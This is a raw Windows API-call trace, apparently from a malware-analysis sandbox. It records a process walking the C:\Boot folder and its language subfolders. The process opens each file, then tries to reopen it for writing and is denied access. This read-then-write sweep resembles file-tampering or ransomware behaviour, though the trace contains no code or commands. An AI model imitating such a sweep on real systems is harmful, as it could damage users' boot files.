ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.543] AreFileApisANSI () returned 1 [0069.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.544] AreFileApisANSI () returned 1 [0069.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0069.544] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.544] GetFileType (hFile=0x418) returned 0x1 [0069.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.545] CloseHandle (hObject=0x418) returned 1 [0069.545] AreFileApisANSI () returned 1 [0069.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0069.545] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.546] GetLastError () returned 0x5 [0069.546] GetLastError () returned 0x5 [0069.546] SetLastError (dwErrCode=0x5) [0069.546] GetLastError () returned 0x5 [0069.546] SetLastError (dwErrCode=0x5) [0069.546] GetLastError () returned 0x5 [0069.546] SetLastError (dwErrCode=0x5) [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.546] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.547] AreFileApisANSI () returned 1 [0069.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.547] AreFileApisANSI () returned 1 [0069.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui") returned 30 [0069.548] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.548] GetFileType (hFile=0x418) returned 0x1 [0069.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.548] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.548] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.548] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.548] CloseHandle (hObject=0x418) returned 1 [0069.549] AreFileApisANSI () returned 1 [0069.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui") returned 30 [0069.549] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.549] GetLastError () returned 0x5 [0069.549] GetLastError () returned 0x5 [0069.549] SetLastError (dwErrCode=0x5) [0069.549] GetLastError () returned 0x5 [0069.549] SetLastError (dwErrCode=0x5) [0069.549] GetLastError () returned 0x5 [0069.549] SetLastError (dwErrCode=0x5) [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.549] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓꾠")) returned 0 [0069.549] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0069.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.550] AreFileApisANSI () returned 1 [0069.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES", lpUsedDefaultChar=0x0) returned 14 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.550] AreFileApisANSI () returned 1 [0069.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0069.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-ES") returned 14 [0069.550] CreateFileW (lpFileName="C:\\Boot\\es-ES" (normalized: "c:\\boot\\es-es"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.551] GetLastError () returned 0x5 [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.551] AreFileApisANSI () returned 1 [0069.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0069.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-ES") returned 14 [0069.551] CreateFileW (lpFileName="C:\\Boot\\es-ES" (normalized: "c:\\boot\\es-es"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.551] GetLastError () returned 0x5 [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] GetLastError () returned 0x5 [0069.551] SetLastError (dwErrCode=0x5) [0069.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.552] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.552] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 